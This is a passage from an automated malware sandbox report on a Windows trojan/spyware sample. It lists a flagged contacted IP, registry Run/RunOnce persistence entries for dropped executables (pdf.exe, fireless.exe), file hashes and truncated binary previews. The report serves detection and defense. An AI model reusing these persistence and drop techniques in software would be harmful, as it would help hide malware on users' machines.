                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBPL_1000572_007.bat.exe, 00000000.00000002.448025477.0000000002961000.00000004.00000800.00020000.00000000.sdmp, Wthdlxoyqvnqsfcfiinf.exe, 0000000C.00000000.475145400.0000000002941000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.590879859.000000000329C000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.589770623.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.589535207.00000000033F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia.13.drfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  185.252.178.63
                                                                  		unknownGermany
                                                                  		10753LVLT-10753UStrue
                                                                  162.55.60.2
                                                                  		showip.netUnited States
                                                                  		35893ACPCAfalse

                                                                  General Information

                                                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                  Analysis ID:708242
                                                                  Start date and time:2022-09-23 07:58:49 +02:00
                                                                  Joe Sandbox Product:CloudBasic
                                                                  Overall analysis duration:0h 10m 3s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:light
                                                                  Sample file name:BPL_1000572_007.bat.exe
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                  Number of analysed new started processes analysed:23
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@14/16@1/2
                                                                  EGA Information:Failed
                                                                  HDC Information:Failed
                                                                  HCA Information:
                                                                  • Successful, ratio: 99%
                                                                  • Number of executed functions: 0
                                                                  • Number of non-executed functions: 0
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                  • TCP Packets have been reduced to 100
                                                                  • Excluded IPs from analysis (whitelisted): 20.189.173.22
                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, watson.telemetry.microsoft.com
                                                                  • Execution Graph export aborted for target BPL_1000572_007.bat.exe, PID 5820 because it is empty
                                                                  • Execution Graph export aborted for target pdf.exe, PID 3712 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                  • VT rate limit hit for: BPL_1000572_007.bat.exe

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  08:00:09API Interceptor42x Sleep call for process: powershell.exe modified
                                                                  08:01:14API Interceptor1x Sleep call for process: BPL_1000572_007.bat.exe modified
                                                                  08:01:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run pdf "C:\Users\user\AppData\Roaming\note\pdf.exe"
                                                                  08:01:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run pdf "C:\Users\user\AppData\Roaming\note\pdf.exe"
                                                                  08:01:40AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce quislingistic C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe
                                                                  08:01:51AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce quislingistic C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe
                                                                  08:01:57API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  No context

                                                                  Domains

                                                                  No context

                                                                  ASNs

                                                                  No context

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Wthdlxoyqvnqsfcf_ec9af89a7aba5095a1b9163a261854dde92db_1f43b382_1621c52a\Report.wer

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):65536
                                                                  Entropy (8bit):1.1154523384164892
                                                                  Encrypted:false
                                                                  SSDEEP:192:6dpuNUESHBUZMXyaKAque5Z/u7s/S274ItS:H2pBUZMXya1uZ/u7s/X4ItS
                                                                  MD5:B9286D1795E2E7949C86D891E9ADC2EB
                                                                  SHA1:C72D39D23BC689E9B214E511739566831E3E93A4
                                                                  SHA-256:44B710B262B4D98D9670E8177867E208A462E679B48E4A6439E201087807EBA8
                                                                  SHA-512:B4F4CF12F947AAD82E963399B7538B51F27072284FBEFD539F9F1D8E09EB9995FCB1A2F001B4A46AF9C853271D27464FC9299A6882FE0BECEF3A4264B4FBD145
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.8.4.1.8.9.0.2.3.4.0.3.5.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.8.4.1.8.9.1.3.9.9.6.5.8.4.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.a.8.b.5.e.a.d.-.7.d.c.1.-.4.3.7.c.-.b.b.2.b.-.1.3.c.6.b.6.d.7.0.c.1.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.9.5.a.6.6.f.-.7.5.5.0.-.4.7.0.b.-.b.c.8.4.-.c.5.f.1.5.6.d.6.4.b.a.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.t.h.d.l.x.o.y.q.v.n.q.s.f.c.f.i.i.n.f...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.i.n.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.9.c.-.0.0.0.1.-.0.0.1.a.-.c.3.c.6.-.2.1.5.1.5.d.c.f.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.0.f.8.1.9.f.b.3.8.9.6.7.5.1.d.e.7.c.6.2.d.b.6.a.9.0.e.3.b.2.b.0.0.0.0.0.0.0.0.!.0.0.0.0.c.2.d.0.1.6.e.d.0.1.1.9.4.1.a.8.f.c.8.7.f.3.2.5.f.2.c.1.d.3.7.

                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER8A92.tmp.dmp

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:Mini DuMP crash report, 15 streams, Fri Sep 23 15:01:48 2022, 0x1205a4 type
                                                                  Category:dropped
                                                                  Size (bytes):240774
                                                                  Entropy (8bit):3.82621578143613
                                                                  Encrypted:false
                                                                  SSDEEP:3072:NN2prvl9gIOgF5hx4lH20glUCgURRpMdco8i5R0yjd+p7l88a:exl9RpDEt29lTjXS5R0fp
                                                                  MD5:46D91CD17431F6B0B4B998A1E8167F4A
                                                                  SHA1:53B6E58CE184904533F98BD2269CB620FD29B03F
                                                                  SHA-256:2152382E54A2D150ADA40B2F94848219EBEC5F8C2220BAB457D7F443AA40B3AC
                                                                  SHA-512:BD922B20E72701E78EAC7D53ACA55D96D2A47D1A63CB988CCF5B975E9AFDEA4ECE84A0C78A0CC6D56F33CAC8141E3398AB5420A9F504BE79DFE70CD02C82772E
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:MDMP....... .......\.-c............D...............X.......T....#......D....R..........`.......8...........T...........H6..>v..........l#..........X%...................................................................U...........B.......%......GenuineIntelW...........T...........6.-c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERA781.tmp.WERInternalMetadata.xml

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):8472
                                                                  Entropy (8bit):3.7005990000293507
                                                                  Encrypted:false
                                                                  SSDEEP:192:Rrl7r3GLNiyq6WtYQgU6Y/961xIKt2gmfZjStCprF89bYbsfaIm:RrlsNin6A6Y1611t2gmf9SvYgf0
                                                                  MD5:1F892ED2A9E7CD005A535EC7D70BAF82
                                                                  SHA1:94FE6AA9C0D1FE54BDA238596F167F5D2A52809A
                                                                  SHA-256:A0CA82DB914D4B2CAB87A6384DBCF61501E30341881AE5E31D8589B6C7F3C78A
                                                                  SHA-512:0839A3A9989C9F8CD2E828AB6001B7ABDFAC8E1BBE425743F756D856E77D648D774530846E6BD15AF2821B0A4C4F015AD990CEC6AABE4665C465804A14E10FFA
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.7.6.<./.P.i.d.>.......

                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERA9A5.tmp.xml

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4800
                                                                  Entropy (8bit):4.483871729451896
                                                                  Encrypted:false
                                                                  SSDEEP:48:cvIwSD8zsQJgtWI9LjWgc8sqYjo8fm8M4JmnG+sFH+q8vlnG+m8eP+MEaRd:uITfWwSgrsqYRJyaKl+8eWMEaRd
                                                                  MD5:BA7C194447B47A27F80AA67550D581C5
                                                                  SHA1:010D44C3C42AE1CE72BB5E4429919298B46508F2
                                                                  SHA-256:B4726C694507908646E3FD5088F2C0F5F74CBC829B241D168738D89EF676D8AC
                                                                  SHA-512:E86578D004DF381A8FEBCBC0366561088F10F0D6DAA5832468F1F3BA930DB0B28932614CD0A2704746D2777022CE561D49B180A2BCC235E5F258DC0FC2760C9B
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1704972" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BPL_1000572_007.bat.exe.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:modified
                                                                  Size (bytes):1265
                                                                  Entropy (8bit):5.351561006604618
                                                                  Encrypted:false
                                                                  SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7UE4KdE4KBLWE4Ks:MxHKXwYHKhQnoPtHoxHhAHKzvUHKdHKu
                                                                  MD5:A5954DA14DDC15175BD61315B8EA45C8
                                                                  SHA1:688A976F957D800BEA0CAA5E25CA012C8DF79FAA
                                                                  SHA-256:E90C9FE30AE1F10B8ACB2EE2477FBEED2A53E86923C9C57D8D91C17FFF18C3C0
                                                                  SHA-512:35BAB190EBA159B03EC83F80E46EFCAD178F1BFF03DAC664EF4F69C2F29DF55FD9A035562EEC2B11320F367C569F2FC6A27DC4A57E8A866D3C2FFA601C439FE8
                                                                  Malicious:true
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):5829
                                                                  Entropy (8bit):4.8968676994158
                                                                  Encrypted:false
                                                                  SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                                                  MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                                                  SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                                                                  SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                                                  SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                                                  Malicious:false
                                                                  Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):16444
                                                                  Entropy (8bit):5.536497593210311
                                                                  Encrypted:false
                                                                  SSDEEP:384:Zte/k0wzps6z0wRBpDRncSBxnUjux5iJ9gGSJ3uzp1oYv:Fl0wRBXc4xUSxNGcuZv
                                                                  MD5:B9CF543484D7F3B967C87F3CD9963FB1
                                                                  SHA1:FF26B20011FDE02F11A7708EC2B201E7285B30AE
                                                                  SHA-256:BBEC3C7A0190E0C56B0C3B49A9F7CFDFC02D795D01B7CB2B65D2FD62D4EC9F30
                                                                  SHA-512:390BC80E412F35D67F4382DFE087264690B1C3DBE184E20522CF9D5B288BA9B978CABDE14AC1F95591B99AA3639554B55AB2C02561DD4F3BCB9BCED549594B38
                                                                  Malicious:false
                                                                  Preview:@...e.........................).Y...8.c..............@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                                  C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):23040
                                                                  Entropy (8bit):3.787825179149624
                                                                  Encrypted:false
                                                                  SSDEEP:96:xLcrSkBp98Z3Cft8e3/dga6vNIqB8Sxxxxr1yFzuzVzdWzizx0zgz8yuzH+XzvzU:xLcuklhfZlga6KqB8ng7LKPiL+
                                                                  MD5:386FB639720C77FC29E68682D264423F
                                                                  SHA1:C2D016ED011941A8FC87F325F2C1D37D73158ADE
                                                                  SHA-256:3BAEBB36220C28C56A692E59E683C77026DAD821CADC377D0D8452D712CCF7A3
                                                                  SHA-512:9B193DA431FFDF47DD5C075018B0A5683FB05FABC8035D075D54CAE856A7B3A66951A547C166EE0449E4DCF0D57360F106E9ADB51765EBA938323C8EBA4F0F6F
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@.+c..............0......J.......-... ........@.. ....................................@..................................,..O....@...H........................................................................... ............... ..H............text...4.... ...................... ..`.rsrc....H...@...H..................@..@.reloc...............X..............@..B.................-......H........!...............................................................(....*..(....*..0..Z.......(....(.......#......*@(........+2...&(.....(....-.(....t....r...p .......o....&..X....i2.*.(....(....*V(....t....r...po....*.0..^....... ....(......&....(....o....o......s......s.... .Zb. ....o....o........,..o......,..o.....&..*...4................(..E........!..O..........IY.......0..........rO..p(....(......-..*.o....*.0..8.......(....r...po.....s.......+......i]....a.o....

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m4mju5by.ked.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Preview:1

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w45iylbi.unn.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Preview:1

                                                                  C:\Users\user\AppData\Roaming\A1EB3E3549D5FF0555D7\LoghemosideroticdJPxvxBPhxRvFDWcDVPhPZaUIGIDQLVJwWmvfjYBsLDUhypometropia

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                  Category:dropped
                                                                  Size (bytes):94208
                                                                  Entropy (8bit):1.2891393435168748
                                                                  Encrypted:false
                                                                  SSDEEP:192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
                                                                  MD5:037D23498B81732EEAAAD0E8015F3F85
                                                                  SHA1:E7719865D7717A4B36D85609F3EC25C10934587F
                                                                  SHA-256:83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
                                                                  SHA-512:BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):23552
                                                                  Entropy (8bit):3.9223154746791433
                                                                  Encrypted:false
                                                                  SSDEEP:96:4Mpiii13IvUthN9COsR/jaUF/oAmhftQ8Sxxxxr1yFzuzVzdWzizx0zgz8yuzH+n:hhC3IvULPCOujXHmo8ng7LKPisdk
                                                                  MD5:4FF4A281A08A0681597794A3024FB584
                                                                  SHA1:D3A70362B238B82DB1EF1AEFEF920AFEDF717880
                                                                  SHA-256:A6DB7E8C70ADC90B74C0F08503F49CF041D79AFED3B916676892725CE2DBCCE0
                                                                  SHA-512:9EDE8EEA5CB5E07187300C221BB9312DCD63E96F10B44697A50BEBF02F18A793B67FAB05A990C48DBDEF32264C89F5C0D0FA553609E2F2191009AF138C42DDB8
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.,c.....................J......./... ...@....@.. ....................................@.................................(/..W....@..hG........................................................................... ............... ..H............text........ ...................... ..`.rsrc...hG...@...H..................@..@.reloc...............Z..............@..B................d/......H........"..|............................................................0..K.......(....r...po.....-.&s.....-.&..-.&+ .+..+..+.......i]....a.o......X....i2..*..0.............-.&(....+.&+.*...ns....%(....(....o....o....*.0..;.......s.....-/&.(.....o....t....r!..po.....o.........o.....+..+.*..0..M.......s....%(....o.........o....%(....o....(...+.o....t)...rs..p .......o!...o....*....0.............,.&(....+.&+.*....0..........(....o"....-.&+.(#...+.*.0.............-.&(....+.&+.

                                                                  C:\Users\user\AppData\Roaming\note\pdf.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):23552
                                                                  Entropy (8bit):3.9223154746791433
                                                                  Encrypted:false
                                                                  SSDEEP:96:4Mpiii13IvUthN9COsR/jaUF/oAmhftQ8Sxxxxr1yFzuzVzdWzizx0zgz8yuzH+n:hhC3IvULPCOujXHmo8ng7LKPisdk
                                                                  MD5:4FF4A281A08A0681597794A3024FB584
                                                                  SHA1:D3A70362B238B82DB1EF1AEFEF920AFEDF717880
                                                                  SHA-256:A6DB7E8C70ADC90B74C0F08503F49CF041D79AFED3B916676892725CE2DBCCE0
                                                                  SHA-512:9EDE8EEA5CB5E07187300C221BB9312DCD63E96F10B44697A50BEBF02F18A793B67FAB05A990C48DBDEF32264C89F5C0D0FA553609E2F2191009AF138C42DDB8
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.,c.....................J......./... ...@....@.. ....................................@.................................(/..W....@..hG........................................................................... ............... ..H............text........ ...................... ..`.rsrc...hG...@...H..................@..@.reloc...............Z..............@..B................d/......H........"..|............................................................0..K.......(....r...po.....-.&s.....-.&..-.&+ .+..+..+.......i]....a.o......X....i2..*..0.............-.&(....+.&+.*...ns....%(....(....o....o....*.0..;.......s.....-/&.(.....o....t....r!..po.....o.........o.....+..+.*..0..M.......s....%(....o.........o....%(....o....(...+.o....t)...rs..p .......o!...o....*....0.............,.&(....+.&+.*....0..........(....o"....-.&+.(#...+.*.0.............-.&(....+.&+.

                                                                  C:\Users\user\AppData\Roaming\note\pdf.exe:Zone.Identifier

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\BPL_1000572_007.bat.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:true
                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                  C:\Windows\appcompat\Programs\Amcache.hve

                                                                  Download File
